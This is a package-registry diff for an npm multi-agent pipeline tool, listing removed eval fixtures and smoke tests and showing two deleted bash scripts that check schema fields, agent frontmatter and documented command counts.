@mmerterden/multi-agent-pipeline 12.7.0 → 12.8.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/CHANGELOG.md +126 -0
- package/install/_common.mjs +48 -0
- package/install/_dev-only-files.mjs +125 -5
- package/install/claude.mjs +14 -8
- package/install/copilot.mjs +5 -8
- package/package.json +17 -2
- package/pipeline/commands/multi-agent/analysis/SKILL.md +1 -1
- package/pipeline/lib/credential-store.sh +20 -0
- package/pipeline/multi-agent-refs/_account-picker.md +1 -1
- package/pipeline/multi-agent-refs/_dev-context.md +1 -1
- package/pipeline/multi-agent-refs/_repo-picker.md +1 -1
- package/pipeline/multi-agent-refs/phases/operations.md +28 -0
- package/pipeline/multi-agent-refs/phases/phase-0-init.md +1 -0
- package/pipeline/multi-agent-refs/phases/phase-2-planning.md +1 -1
- package/pipeline/multi-agent-refs/phases/phase-3-dev.md +1 -2
- package/pipeline/multi-agent-refs/phases/phase-4-review.md +49 -4
- package/pipeline/schemas/prefs.schema.json +6 -0
- package/pipeline/scripts/_smoke-root.sh +61 -0
- package/pipeline/scripts/audit-log.sh +25 -0
- package/pipeline/scripts/smoke-cross-cli-behavior.sh +21 -7
- package/pipeline/eval/golden-tasks/01-ios-bugfix-darkmode/expected/phase-1-analysis.json +0 -25
- package/pipeline/eval/golden-tasks/01-ios-bugfix-darkmode/expected/phase-2-plan.json +0 -30
- package/pipeline/eval/golden-tasks/01-ios-bugfix-darkmode/expected/phase-4-review.json +0 -20
- package/pipeline/eval/golden-tasks/01-ios-bugfix-darkmode/expected/phase-4-triage.json +0 -15
- package/pipeline/eval/golden-tasks/01-ios-bugfix-darkmode/metadata.json +0 -14
- package/pipeline/eval/golden-tasks/01-ios-bugfix-darkmode/task.json +0 -12
- package/pipeline/eval/golden-tasks/02-android-feature-compose/expected/phase-1-analysis.json +0 -29
- package/pipeline/eval/golden-tasks/02-android-feature-compose/expected/phase-2-plan.json +0 -43
- package/pipeline/eval/golden-tasks/02-android-feature-compose/expected/phase-4-review.json +0 -35
- package/pipeline/eval/golden-tasks/02-android-feature-compose/expected/phase-4-triage.json +0 -35
- package/pipeline/eval/golden-tasks/02-android-feature-compose/metadata.json +0 -14
- package/pipeline/eval/golden-tasks/02-android-feature-compose/task.json +0 -12
- package/pipeline/eval/golden-tasks/03-backend-python-ratelimit/expected/phase-1-analysis.json +0 -29
- package/pipeline/eval/golden-tasks/03-backend-python-ratelimit/expected/phase-2-plan.json +0 -42
- package/pipeline/eval/golden-tasks/03-backend-python-ratelimit/expected/phase-4-review.json +0 -20
- package/pipeline/eval/golden-tasks/03-backend-python-ratelimit/expected/phase-4-triage.json +0 -15
- package/pipeline/eval/golden-tasks/03-backend-python-ratelimit/metadata.json +0 -14
- package/pipeline/eval/golden-tasks/03-backend-python-ratelimit/task.json +0 -12
- package/pipeline/eval/golden-tasks/04-frontend-next-hydration/expected/phase-1-analysis.json +0 -29
- package/pipeline/eval/golden-tasks/04-frontend-next-hydration/expected/phase-2-plan.json +0 -40
- package/pipeline/eval/golden-tasks/04-frontend-next-hydration/expected/phase-4-review.json +0 -20
- package/pipeline/eval/golden-tasks/04-frontend-next-hydration/expected/phase-4-triage.json +0 -15
- package/pipeline/eval/golden-tasks/04-frontend-next-hydration/metadata.json +0 -14
- package/pipeline/eval/golden-tasks/04-frontend-next-hydration/task.json +0 -12
- package/pipeline/eval/golden-tasks/05-ios-security-keychain/expected/phase-1-analysis.json +0 -29
- package/pipeline/eval/golden-tasks/05-ios-security-keychain/expected/phase-2-plan.json +0 -42
- package/pipeline/eval/golden-tasks/05-ios-security-keychain/expected/phase-4-review.json +0 -28
- package/pipeline/eval/golden-tasks/05-ios-security-keychain/expected/phase-4-triage.json +0 -27
- package/pipeline/eval/golden-tasks/05-ios-security-keychain/metadata.json +0 -14
- package/pipeline/eval/golden-tasks/05-ios-security-keychain/task.json +0 -12
- package/pipeline/eval/golden-tasks/06-android-refactor-usecase/expected/phase-1-analysis.json +0 -29
- package/pipeline/eval/golden-tasks/06-android-refactor-usecase/expected/phase-2-plan.json +0 -41
- package/pipeline/eval/golden-tasks/06-android-refactor-usecase/expected/phase-4-review.json +0 -12
- package/pipeline/eval/golden-tasks/06-android-refactor-usecase/expected/phase-4-triage.json +0 -6
- package/pipeline/eval/golden-tasks/06-android-refactor-usecase/metadata.json +0 -14
- package/pipeline/eval/golden-tasks/06-android-refactor-usecase/task.json +0 -12
- package/pipeline/eval/golden-tasks/07-backend-node-idempotency/expected/phase-1-analysis.json +0 -29
- package/pipeline/eval/golden-tasks/07-backend-node-idempotency/expected/phase-2-plan.json +0 -42
- package/pipeline/eval/golden-tasks/07-backend-node-idempotency/expected/phase-4-review.json +0 -28
- package/pipeline/eval/golden-tasks/07-backend-node-idempotency/expected/phase-4-triage.json +0 -27
- package/pipeline/eval/golden-tasks/07-backend-node-idempotency/metadata.json +0 -14
- package/pipeline/eval/golden-tasks/07-backend-node-idempotency/task.json +0 -12
- package/pipeline/eval/golden-tasks/08-ios-auth-consensus-unverified/expected/phase-1-analysis.json +0 -25
- package/pipeline/eval/golden-tasks/08-ios-auth-consensus-unverified/expected/phase-2-plan.json +0 -31
- package/pipeline/eval/golden-tasks/08-ios-auth-consensus-unverified/expected/phase-4-review.json +0 -12
- package/pipeline/eval/golden-tasks/08-ios-auth-consensus-unverified/expected/phase-4-triage.json +0 -18
- package/pipeline/eval/golden-tasks/08-ios-auth-consensus-unverified/metadata.json +0 -14
- package/pipeline/eval/golden-tasks/08-ios-auth-consensus-unverified/task.json +0 -12
- package/pipeline/eval/golden-tasks/README.md +0 -65
- package/pipeline/eval/intent-cases.json +0 -40
- package/pipeline/eval/run-metrics-fixture.json +0 -93
- package/pipeline/eval/triage/01-empty-findings/expected.json +0 -6
- package/pipeline/eval/triage/01-empty-findings/input.json +0 -5
- package/pipeline/eval/triage/01-empty-findings/notes.md +0 -7
- package/pipeline/eval/triage/02-real-blocker/expected.json +0 -15
- package/pipeline/eval/triage/02-real-blocker/input.json +0 -14
- package/pipeline/eval/triage/02-real-blocker/notes.md +0 -7
- package/pipeline/eval/triage/03-out-of-scope-defer/expected.json +0 -18
- package/pipeline/eval/triage/03-out-of-scope-defer/input.json +0 -14
- package/pipeline/eval/triage/03-out-of-scope-defer/notes.md +0 -10
- package/pipeline/eval/triage/04-false-positive-reject/expected.json +0 -18
- package/pipeline/eval/triage/04-false-positive-reject/input.json +0 -14
- package/pipeline/eval/triage/04-false-positive-reject/notes.md +0 -10
- package/pipeline/eval/triage/05-mixed-classification/expected.json +0 -43
- package/pipeline/eval/triage/05-mixed-classification/input.json +0 -38
- package/pipeline/eval/triage/05-mixed-classification/notes.md +0 -17
- package/pipeline/eval/triage/06-severity-mismatch/expected.json +0 -15
- package/pipeline/eval/triage/06-severity-mismatch/input.json +0 -14
- package/pipeline/eval/triage/06-severity-mismatch/notes.md +0 -9
- package/pipeline/eval/triage/07-duplicate-reviewers/expected.json +0 -27
- package/pipeline/eval/triage/07-duplicate-reviewers/input.json +0 -22
- package/pipeline/eval/triage/07-duplicate-reviewers/notes.md +0 -9
- package/pipeline/eval/triage/08-style-misclassified/expected.json +0 -18
- package/pipeline/eval/triage/08-style-misclassified/input.json +0 -14
- package/pipeline/eval/triage/08-style-misclassified/notes.md +0 -9
- package/pipeline/eval/triage/09-cascading-finding/expected.json +0 -23
- package/pipeline/eval/triage/09-cascading-finding/input.json +0 -22
- package/pipeline/eval/triage/09-cascading-finding/notes.md +0 -9
- package/pipeline/eval/triage/10-deferred-crossref/expected.json +0 -18
- package/pipeline/eval/triage/10-deferred-crossref/input.json +0 -14
- package/pipeline/eval/triage/10-deferred-crossref/notes.md +0 -9
- package/pipeline/eval/triage/11-vercel-token-leak-blocker/expected.json +0 -27
- package/pipeline/eval/triage/11-vercel-token-leak-blocker/input.json +0 -22
- package/pipeline/eval/triage/11-vercel-token-leak-blocker/notes.md +0 -14
- package/pipeline/eval/triage/README.md +0 -54
- package/pipeline/scripts/benchmark-phase-0.sh +0 -128
- package/pipeline/scripts/check-md-links.mjs +0 -88
- package/pipeline/scripts/eval-golden-tasks-live.mjs +0 -302
- package/pipeline/scripts/eval-golden-tasks.mjs +0 -224
- package/pipeline/scripts/eval-intent.mjs +0 -107
- package/pipeline/scripts/eval-mine-corpus.mjs +0 -211
- package/pipeline/scripts/eval-triage.mjs +0 -171
- package/pipeline/scripts/fixtures/diff-risk-android.diff +0 -40
- package/pipeline/scripts/fixtures/diff-risk-ios.diff +0 -48
- package/pipeline/scripts/fixtures/diff-risk-test-removal.diff +0 -40
- package/pipeline/scripts/fixtures/install-layout.tsv +0 -19
- package/pipeline/scripts/fixtures/pack-expected-count.txt +0 -1
- package/pipeline/scripts/fixtures/test-gap-node.diff +0 -30
- package/pipeline/scripts/fixtures/test-gap-python.diff +0 -32
- package/pipeline/scripts/lint-mcp-refs.mjs +0 -218
- package/pipeline/scripts/lint-skills.mjs +0 -154
- package/pipeline/scripts/run-smokes.mjs +0 -130
- package/pipeline/scripts/scorecard.mjs +0 -258
- package/pipeline/scripts/smoke-add-detail.sh +0 -137
- package/pipeline/scripts/smoke-agent-guard.sh +0 -74
- package/pipeline/scripts/smoke-agent-log-cost.sh +0 -262
- package/pipeline/scripts/smoke-agent-model-routing.sh +0 -87
- package/pipeline/scripts/smoke-ask-choice.sh +0 -42
- package/pipeline/scripts/smoke-autopilot-circuit-breaker.sh +0 -36
- package/pipeline/scripts/smoke-bitbucket-contract.sh +0 -255
- package/pipeline/scripts/smoke-changelog-version.sh +0 -47
- package/pipeline/scripts/smoke-channels-approval-gate.sh +0 -60
- package/pipeline/scripts/smoke-channels-flow.sh +0 -130
- package/pipeline/scripts/smoke-ci-workflows.sh +0 -88
- package/pipeline/scripts/smoke-clarify.sh +0 -148
- package/pipeline/scripts/smoke-command-inventory.sh +0 -81
- package/pipeline/scripts/smoke-commands-skills-parity.sh +0 -87
- package/pipeline/scripts/smoke-community-gates.sh +0 -75
- package/pipeline/scripts/smoke-compliance-skills.sh +0 -119
- package/pipeline/scripts/smoke-config-hygiene.sh +0 -58
- package/pipeline/scripts/smoke-context-budget.sh +0 -72
- package/pipeline/scripts/smoke-cost-budget.sh +0 -70
- package/pipeline/scripts/smoke-cost-summary.sh +0 -139
- package/pipeline/scripts/smoke-cross-phase-cohesion.sh +0 -128
- package/pipeline/scripts/smoke-description-tr.sh +0 -82
- package/pipeline/scripts/smoke-dev-critic.sh +0 -144
- package/pipeline/scripts/smoke-diff-explain.sh +0 -147
- package/pipeline/scripts/smoke-diff-risk.sh +0 -190
- package/pipeline/scripts/smoke-dynamic-skill-loading.sh +0 -160
- package/pipeline/scripts/smoke-eval-live.sh +0 -136
- package/pipeline/scripts/smoke-evidence-gate.sh +0 -93
- package/pipeline/scripts/smoke-extract-conventions.sh +0 -163
- package/pipeline/scripts/smoke-fetchers-offline.sh +0 -448
- package/pipeline/scripts/smoke-figma-dispatch.sh +0 -112
- package/pipeline/scripts/smoke-gate-hooks.sh +0 -74
- package/pipeline/scripts/smoke-gc-tmp.sh +0 -130
- package/pipeline/scripts/smoke-gc-worktrees.sh +0 -125
- package/pipeline/scripts/smoke-generate-issue.sh +0 -120
- package/pipeline/scripts/smoke-handoff-contract.sh +0 -92
- package/pipeline/scripts/smoke-identity-isolation.sh +0 -70
- package/pipeline/scripts/smoke-install-layout.sh +0 -248
- package/pipeline/scripts/smoke-intent-guard.sh +0 -86
- package/pipeline/scripts/smoke-issue-comment-template.sh +0 -86
- package/pipeline/scripts/smoke-issue-jira-triad.sh +0 -120
- package/pipeline/scripts/smoke-keychain.sh +0 -158
- package/pipeline/scripts/smoke-language-axis.sh +0 -109
- package/pipeline/scripts/smoke-learning-curve.sh +0 -61
- package/pipeline/scripts/smoke-learnings-ledger.sh +0 -86
- package/pipeline/scripts/smoke-lib-scripts.sh +0 -448
- package/pipeline/scripts/smoke-mcp-gate.sh +0 -68
- package/pipeline/scripts/smoke-md-links.sh +0 -8
- package/pipeline/scripts/smoke-md2confluence.sh +0 -126
- package/pipeline/scripts/smoke-metrics-cache-ratio.sh +0 -72
- package/pipeline/scripts/smoke-migrate-state.sh +0 -102
- package/pipeline/scripts/smoke-mode-dispatch-drift.sh +0 -161
- package/pipeline/scripts/smoke-model-fallback.sh +0 -89
- package/pipeline/scripts/smoke-multi-repo-integration.sh +0 -116
- package/pipeline/scripts/smoke-multi-repo-worktree.sh +0 -61
- package/pipeline/scripts/smoke-no-mcp-in-dev-phases.sh +0 -194
- package/pipeline/scripts/smoke-no-token-prompt.sh +0 -85
- package/pipeline/scripts/smoke-own-punctuation.sh +0 -103
- package/pipeline/scripts/smoke-pack-contents.sh +0 -140
- package/pipeline/scripts/smoke-pat-audit.sh +0 -128
- package/pipeline/scripts/smoke-per-repo-memory.sh +0 -156
- package/pipeline/scripts/smoke-phase-0-multi-repo.sh +0 -170
- package/pipeline/scripts/smoke-phase-6-multi.sh +0 -79
- package/pipeline/scripts/smoke-phase-banner.sh +0 -101
- package/pipeline/scripts/smoke-phase-tracker.sh +0 -324
- package/pipeline/scripts/smoke-phase0-bridge-contract.sh +0 -241
- package/pipeline/scripts/smoke-phase4-gates.sh +0 -45
- package/pipeline/scripts/smoke-phase4-triage.sh +0 -229
- package/pipeline/scripts/smoke-plan-approval-gate.sh +0 -71
- package/pipeline/scripts/smoke-plan-safety.sh +0 -139
- package/pipeline/scripts/smoke-plan-todos.sh +0 -196
- package/pipeline/scripts/smoke-pr-review-actions.sh +0 -152
- package/pipeline/scripts/smoke-pre-commit.sh +0 -170
- package/pipeline/scripts/smoke-pref-migration.sh +0 -226
- package/pipeline/scripts/smoke-prefs-language.sh +0 -134
- package/pipeline/scripts/smoke-progress-contract.sh +0 -127
- package/pipeline/scripts/smoke-prune-logs.sh +0 -137
- package/pipeline/scripts/smoke-purge.sh +0 -138
- package/pipeline/scripts/smoke-push-retry.sh +0 -75
- package/pipeline/scripts/smoke-repo-map.sh +0 -300
- package/pipeline/scripts/smoke-review-readiness.sh +0 -92
- package/pipeline/scripts/smoke-review-watch.sh +0 -146
- package/pipeline/scripts/smoke-routines.sh +0 -84
- package/pipeline/scripts/smoke-run-aggregator.sh +0 -216
- package/pipeline/scripts/smoke-run-metrics.sh +0 -50
- package/pipeline/scripts/smoke-search.sh +0 -187
- package/pipeline/scripts/smoke-shadow-git.sh +0 -224
- package/pipeline/scripts/smoke-skill-authoring.sh +0 -137
- package/pipeline/scripts/smoke-skill-language.sh +0 -83
- package/pipeline/scripts/smoke-skill-manifest.sh +0 -138
- package/pipeline/scripts/smoke-skill-scan.sh +0 -198
- package/pipeline/scripts/smoke-source-parity.sh +0 -85
- package/pipeline/scripts/smoke-subagent-validators.sh +0 -108
- package/pipeline/scripts/smoke-sync-parity.sh +0 -92
- package/pipeline/scripts/smoke-tasklist-ordering.sh +0 -112
- package/pipeline/scripts/smoke-telemetry.sh +0 -147
- package/pipeline/scripts/smoke-test-gap.sh +0 -183
- package/pipeline/scripts/smoke-token-budget.sh +0 -67
- package/pipeline/scripts/smoke-token-preflight.sh +0 -82
- package/pipeline/scripts/smoke-tracker-contract.sh +0 -191
- package/pipeline/scripts/smoke-tracker-tokens-invocation.sh +0 -73
- package/pipeline/scripts/smoke-triage-memory.sh +0 -174
- package/pipeline/scripts/smoke-update-check.sh +0 -135
- package/pipeline/scripts/smoke-url-enrichment.sh +0 -70
- package/pipeline/scripts/smoke-validate-analysis-doc.sh +0 -161
- package/pipeline/scripts/smoke-validator-contradiction.sh +0 -67
- package/pipeline/scripts/smoke-validator-gates.sh +0 -164
- package/pipeline/scripts/smoke-vercel-deploy-redact.sh +0 -129
- package/pipeline/scripts/smoke-verify-by-test.sh +0 -148
- package/pipeline/scripts/smoke-wiki-integration.sh +0 -122
- package/pipeline/scripts/smoke-work-summary.sh +0 -163
- package/pipeline/scripts/smoke-workflow-audit.sh +0 -101
- package/pipeline/scripts/smoke-worktree-path-convention.sh +0 -86
- package/pipeline/scripts/smoke-wrapper-preservation.sh +0 -68
- package/pipeline/scripts/smoke-write-state.sh +0 -159
- package/pipeline/scripts/sync-parity-check.sh +0 -135
- package/pipeline/scripts/test-gap-rules/android.json +0 -25
- package/pipeline/scripts/test-gap-rules/ios.json +0 -34
- package/pipeline/scripts/test-gap-rules/node.json +0 -29
- package/pipeline/scripts/test-gap-rules/python.json +0 -25
- package/pipeline/scripts/validate-schemas.mjs +0 -88
|
@@ -1,148 +0,0 @@
|
|
|
1
|
-
#!/usr/bin/env bash
|
|
2
|
-
# smoke-clarify.sh
|
|
3
|
-
#
|
|
4
|
-
# Verifies the Phase 0 Step 8 clarifying-question loop:
|
|
5
|
-
# 1. pipeline/agents/task-clarifier.md exists with required frontmatter
|
|
6
|
-
# 2. Agent default model is haiku (cost-driven choice)
|
|
7
|
-
# 3. clarify-output schema is valid JSON
|
|
8
|
-
# 4. Schema enforces clarityScore range (0-10)
|
|
9
|
-
# 5. Schema enforces options minItems 2 / maxItems 4
|
|
10
|
-
# 6. Schema declares stopAndAsk + questions + userAnswers
|
|
11
|
-
# 7. prefs schema exposes clarifyAmbiguous.{enabled, model, minScoreToProceed, maxQuestions, autopilotMode}
|
|
12
|
-
# 8. clarifyAmbiguous.enabled defaults to false (opt-in)
|
|
13
|
-
# 9. autopilotMode default is "log" (preserve autopilot signal without blocking)
|
|
14
|
-
# 10. minScoreToProceed default is 6 (borderline-clear threshold)
|
|
15
|
-
# 11. phase-0-init.md documents Step 8 (Clarification)
|
|
16
|
-
# 12. phase-0-init.md cites task-clarifier.md
|
|
17
|
-
# 13. phase-0-init.md documents all 3 autopilot modes (skip/log/abort)
|
|
18
|
-
#
|
|
19
|
-
# Exit 0 = all pass, 1 = any failure.
|
|
20
|
-
|
|
21
|
-
set -uo pipefail
|
|
22
|
-
|
|
23
|
-
ROOT="$(cd "$(dirname "$0")/../.." && pwd)"
|
|
24
|
-
AGENT="$ROOT/pipeline/agents/task-clarifier.md"
|
|
25
|
-
SCHEMA="$ROOT/pipeline/schemas/clarify-output.schema.json"
|
|
26
|
-
PREFS_SCHEMA="$ROOT/pipeline/schemas/prefs.schema.json"
|
|
27
|
-
PHASE_DOC="$ROOT/pipeline/multi-agent-refs/phases/phase-0-init.md"
|
|
28
|
-
|
|
29
|
-
pass=0
|
|
30
|
-
fail=0
|
|
31
|
-
failures=()
|
|
32
|
-
record_pass() { pass=$((pass + 1)); printf ' \033[0;32mPASS\033[0m %s\n' "$1"; }
|
|
33
|
-
record_fail() { fail=$((fail + 1)); failures+=("$1"); printf ' \033[0;31mFAIL\033[0m %s\n' "$1"; }
|
|
34
|
-
|
|
35
|
-
printf '→ smoke-clarify: Phase 0 Step 8 clarifying-question loop contract\n'
|
|
36
|
-
|
|
37
|
-
# 1-2. Agent file + frontmatter + model
|
|
38
|
-
if [ ! -f "$AGENT" ]; then
|
|
39
|
-
record_fail "pipeline/agents/task-clarifier.md missing"
|
|
40
|
-
else
|
|
41
|
-
fm=$(awk '/^---$/{n++; if(n==2) exit; if(n==1) next} n==1{print}' "$AGENT")
|
|
42
|
-
for key in description model preferredModel; do
|
|
43
|
-
if grep -qE "^${key}:" <<<"$fm"; then
|
|
44
|
-
record_pass "agent frontmatter has '${key}'"
|
|
45
|
-
else
|
|
46
|
-
record_fail "agent frontmatter missing '${key}'"
|
|
47
|
-
fi
|
|
48
|
-
done
|
|
49
|
-
if grep -qE "^model: haiku" <<<"$fm"; then
|
|
50
|
-
record_pass "agent default model is haiku (cost-driven choice)"
|
|
51
|
-
else
|
|
52
|
-
record_fail "agent model default should be haiku"
|
|
53
|
-
fi
|
|
54
|
-
fi
|
|
55
|
-
|
|
56
|
-
# 3-6. Output schema shape
|
|
57
|
-
if [ ! -f "$SCHEMA" ]; then
|
|
58
|
-
record_fail "clarify-output.schema.json missing"
|
|
59
|
-
elif ! jq empty "$SCHEMA" 2>/dev/null; then
|
|
60
|
-
record_fail "clarify-output.schema.json is not valid JSON"
|
|
61
|
-
else
|
|
62
|
-
record_pass "clarify-output.schema.json parses"
|
|
63
|
-
if jq -e '.properties.clarityScore | (.minimum == 0 and .maximum == 10)' "$SCHEMA" >/dev/null 2>&1; then
|
|
64
|
-
record_pass "schema enforces clarityScore range 0-10"
|
|
65
|
-
else
|
|
66
|
-
record_fail "schema clarityScore range incorrect"
|
|
67
|
-
fi
|
|
68
|
-
if jq -e '.properties.questions.items.properties.options | (.minItems == 2 and .maxItems == 4)' "$SCHEMA" >/dev/null 2>&1; then
|
|
69
|
-
record_pass "schema enforces options minItems 2 / maxItems 4"
|
|
70
|
-
else
|
|
71
|
-
record_fail "schema options bounds missing"
|
|
72
|
-
fi
|
|
73
|
-
for prop in stopAndAsk questions userAnswers; do
|
|
74
|
-
if jq -e ".properties.${prop}" "$SCHEMA" >/dev/null 2>&1; then
|
|
75
|
-
record_pass "schema exposes '${prop}'"
|
|
76
|
-
else
|
|
77
|
-
record_fail "schema missing '${prop}'"
|
|
78
|
-
fi
|
|
79
|
-
done
|
|
80
|
-
fi
|
|
81
|
-
|
|
82
|
-
# 7. Prefs schema toggle exposure
|
|
83
|
-
for prop in enabled model minScoreToProceed maxQuestions autopilotMode; do
|
|
84
|
-
if jq -e ".properties.global.properties.clarifyAmbiguous.properties.${prop}" "$PREFS_SCHEMA" >/dev/null 2>&1; then
|
|
85
|
-
record_pass "prefs schema exposes clarifyAmbiguous.${prop}"
|
|
86
|
-
else
|
|
87
|
-
record_fail "prefs schema missing clarifyAmbiguous.${prop}"
|
|
88
|
-
fi
|
|
89
|
-
done
|
|
90
|
-
|
|
91
|
-
# 8. Off by default
|
|
92
|
-
if jq -e '.properties.global.properties.clarifyAmbiguous.properties.enabled
|
|
93
|
-
| has("default") and .default == false' "$PREFS_SCHEMA" >/dev/null 2>&1; then
|
|
94
|
-
record_pass "clarifyAmbiguous.enabled defaults to false (opt-in)"
|
|
95
|
-
else
|
|
96
|
-
record_fail "clarifyAmbiguous.enabled should default to false"
|
|
97
|
-
fi
|
|
98
|
-
|
|
99
|
-
# 9. autopilotMode default = "log"
|
|
100
|
-
ap_default=$(jq -r '.properties.global.properties.clarifyAmbiguous.properties.autopilotMode.default // empty' "$PREFS_SCHEMA")
|
|
101
|
-
if [ "$ap_default" = "log" ]; then
|
|
102
|
-
record_pass "autopilotMode defaults to log"
|
|
103
|
-
else
|
|
104
|
-
record_fail "autopilotMode default should be 'log' (got: ${ap_default:-missing})"
|
|
105
|
-
fi
|
|
106
|
-
|
|
107
|
-
# 10. minScoreToProceed default = 6
|
|
108
|
-
ms_default=$(jq -r '.properties.global.properties.clarifyAmbiguous.properties.minScoreToProceed.default // empty' "$PREFS_SCHEMA")
|
|
109
|
-
if [ "$ms_default" = "6" ]; then
|
|
110
|
-
record_pass "minScoreToProceed defaults to 6"
|
|
111
|
-
else
|
|
112
|
-
record_fail "minScoreToProceed default should be 6 (got: ${ms_default:-missing})"
|
|
113
|
-
fi
|
|
114
|
-
|
|
115
|
-
# 11. Phase doc documents Step 8
|
|
116
|
-
if [ ! -f "$PHASE_DOC" ]; then
|
|
117
|
-
record_fail "phase-0-init.md missing"
|
|
118
|
-
else
|
|
119
|
-
if grep -qE 'Step 8 - Clarification' "$PHASE_DOC"; then
|
|
120
|
-
record_pass "phase-0-init.md documents Step 8 - Clarification"
|
|
121
|
-
else
|
|
122
|
-
record_fail "phase-0-init.md missing Step 8 - Clarification section"
|
|
123
|
-
fi
|
|
124
|
-
# 12. cites task-clarifier
|
|
125
|
-
if grep -qF "task-clarifier.md" "$PHASE_DOC"; then
|
|
126
|
-
record_pass "phase doc cites agents/task-clarifier.md"
|
|
127
|
-
else
|
|
128
|
-
record_fail "phase doc must reference agents/task-clarifier.md"
|
|
129
|
-
fi
|
|
130
|
-
# 13. all 3 autopilot modes named in the doc
|
|
131
|
-
has_skip=0; has_log=0; has_abort=0
|
|
132
|
-
grep -q "\`skip\`" "$PHASE_DOC" && has_skip=1
|
|
133
|
-
grep -q "\`log\`" "$PHASE_DOC" && has_log=1
|
|
134
|
-
grep -q "\`abort\`" "$PHASE_DOC" && has_abort=1
|
|
135
|
-
if [ "$has_skip" = "1" ] && [ "$has_log" = "1" ] && [ "$has_abort" = "1" ]; then
|
|
136
|
-
record_pass "phase doc documents all 3 autopilot modes (skip/log/abort)"
|
|
137
|
-
else
|
|
138
|
-
record_fail "phase doc missing one of skip/log/abort autopilot modes"
|
|
139
|
-
fi
|
|
140
|
-
fi
|
|
141
|
-
|
|
142
|
-
printf '\n══ clarify smoke: %d passed, %d failed ══\n' "$pass" "$fail"
|
|
143
|
-
if [ "$fail" -gt 0 ]; then
|
|
144
|
-
printf '\nFailures:\n'
|
|
145
|
-
for msg in "${failures[@]}"; do printf ' - %s\n' "$msg"; done
|
|
146
|
-
exit 1
|
|
147
|
-
fi
|
|
148
|
-
exit 0
|
|
@@ -1,81 +0,0 @@
|
|
|
1
|
-
#!/usr/bin/env bash
|
|
2
|
-
# smoke-command-inventory.sh - the command inventory is DERIVED, never asserted.
|
|
3
|
-
#
|
|
4
|
-
# Every count that describes "how many multi-agent commands exist" used to be a
|
|
5
|
-
# literal in prose (contract header, sync skill, dispatcher). Adding a command
|
|
6
|
-
# left those literals stale while every gate stayed green, because the gates
|
|
7
|
-
# asserted the literal instead of the tree. This gate computes the count from
|
|
8
|
-
# pipeline/commands/multi-agent/*/ and requires the prose to agree.
|
|
9
|
-
#
|
|
10
|
-
# Verifies:
|
|
11
|
-
# 1. contract header count == number of command directories
|
|
12
|
-
# 2. every command directory appears in the contract inventory block
|
|
13
|
-
# 3. both sync surfaces (command + Copilot skill) carry the same count twice
|
|
14
|
-
# ("N commands are synced" + "instructions + N sub-command skills")
|
|
15
|
-
# 4. every command directory appears in both sync inventory blocks
|
|
16
|
-
# 5. every command directory has its shared/core skill counterpart
|
|
17
|
-
#
|
|
18
|
-
# Exit: 0 all green, 1 any failure.
|
|
19
|
-
|
|
20
|
-
set -euo pipefail
|
|
21
|
-
|
|
22
|
-
HERE="$(cd "$(dirname "$0")" && pwd)"
|
|
23
|
-
ROOT="$(cd "$HERE/../.." && pwd)"
|
|
24
|
-
CMD_DIR="$ROOT/pipeline/commands/multi-agent"
|
|
25
|
-
CONTRACT="$ROOT/pipeline/multi-agent-refs/cross-cli-contract.md"
|
|
26
|
-
SYNC="$ROOT/pipeline/commands/multi-agent/sync/SKILL.md"
|
|
27
|
-
SYNC_SKILL="$ROOT/pipeline/skills/shared/core/multi-agent-sync/SKILL.md"
|
|
28
|
-
SKILLS_DIR="$ROOT/pipeline/skills/shared/core"
|
|
29
|
-
|
|
30
|
-
PASS=0
|
|
31
|
-
FAIL=0
|
|
32
|
-
pass() { PASS=$((PASS+1)); echo " ✓ $1"; }
|
|
33
|
-
fail() { FAIL=$((FAIL+1)); echo " ✗ $1"; }
|
|
34
|
-
|
|
35
|
-
echo "══ smoke-command-inventory ══"
|
|
36
|
-
|
|
37
|
-
for f in "$CONTRACT" "$SYNC" "$SYNC_SKILL"; do
|
|
38
|
-
[ -f "$f" ] || { echo " ✗ missing file: ${f#$ROOT/}"; exit 1; }
|
|
39
|
-
done
|
|
40
|
-
|
|
41
|
-
COMMANDS=$(find "$CMD_DIR" -mindepth 1 -maxdepth 1 -type d -exec basename {} \; | sort)
|
|
42
|
-
N=$(printf '%s\n' "$COMMANDS" | grep -c . || true)
|
|
43
|
-
|
|
44
|
-
echo "→ 1. derived count from the command tree: $N commands"
|
|
45
|
-
[ "$N" -gt 0 ] && pass "found $N command directories" || fail "no command directories under ${CMD_DIR#$ROOT/}"
|
|
46
|
-
|
|
47
|
-
echo "→ 2. contract header agrees"
|
|
48
|
-
if grep -Fq "## 1. Command Inventory ($N commands)" "$CONTRACT"; then
|
|
49
|
-
pass "contract header = $N"
|
|
50
|
-
else
|
|
51
|
-
fail "contract header does not say ($N commands): $(grep -o '## 1\. Command Inventory ([0-9]* commands)' "$CONTRACT" || echo 'header not found')"
|
|
52
|
-
fi
|
|
53
|
-
|
|
54
|
-
echo "→ 3. sync surfaces agree (2 counts x 2 files)"
|
|
55
|
-
for f in "$SYNC" "$SYNC_SKILL"; do
|
|
56
|
-
rel="${f#$ROOT/}"
|
|
57
|
-
grep -Fq "**$N commands are synced**" "$f" && pass "$rel: synced count = $N" || fail "$rel: 'N commands are synced' != $N"
|
|
58
|
-
grep -Fq "instructions + $N sub-command skills" "$f" && pass "$rel: step-2 count = $N" || fail "$rel: 'instructions + N sub-command skills' != $N"
|
|
59
|
-
done
|
|
60
|
-
|
|
61
|
-
echo "→ 4. every command is listed in the contract + both sync inventories"
|
|
62
|
-
MISSING_LIST=0
|
|
63
|
-
while IFS= read -r cmd; do
|
|
64
|
-
[ -n "$cmd" ] || continue
|
|
65
|
-
for f in "$CONTRACT" "$SYNC" "$SYNC_SKILL"; do
|
|
66
|
-
grep -Eq "(^|[ ,])$cmd([ ,]|$)" "$f" || { fail "${f#$ROOT/}: inventory missing '$cmd'"; MISSING_LIST=1; }
|
|
67
|
-
done
|
|
68
|
-
done <<< "$COMMANDS"
|
|
69
|
-
[ "$MISSING_LIST" -eq 0 ] && pass "all $N commands listed on all 3 surfaces"
|
|
70
|
-
|
|
71
|
-
echo "→ 5. shared/core skill counterpart exists for every command"
|
|
72
|
-
MISSING_SKILL=0
|
|
73
|
-
while IFS= read -r cmd; do
|
|
74
|
-
[ -n "$cmd" ] || continue
|
|
75
|
-
[ -f "$SKILLS_DIR/multi-agent-$cmd/SKILL.md" ] || { fail "no shared/core skill for '$cmd'"; MISSING_SKILL=1; }
|
|
76
|
-
done <<< "$COMMANDS"
|
|
77
|
-
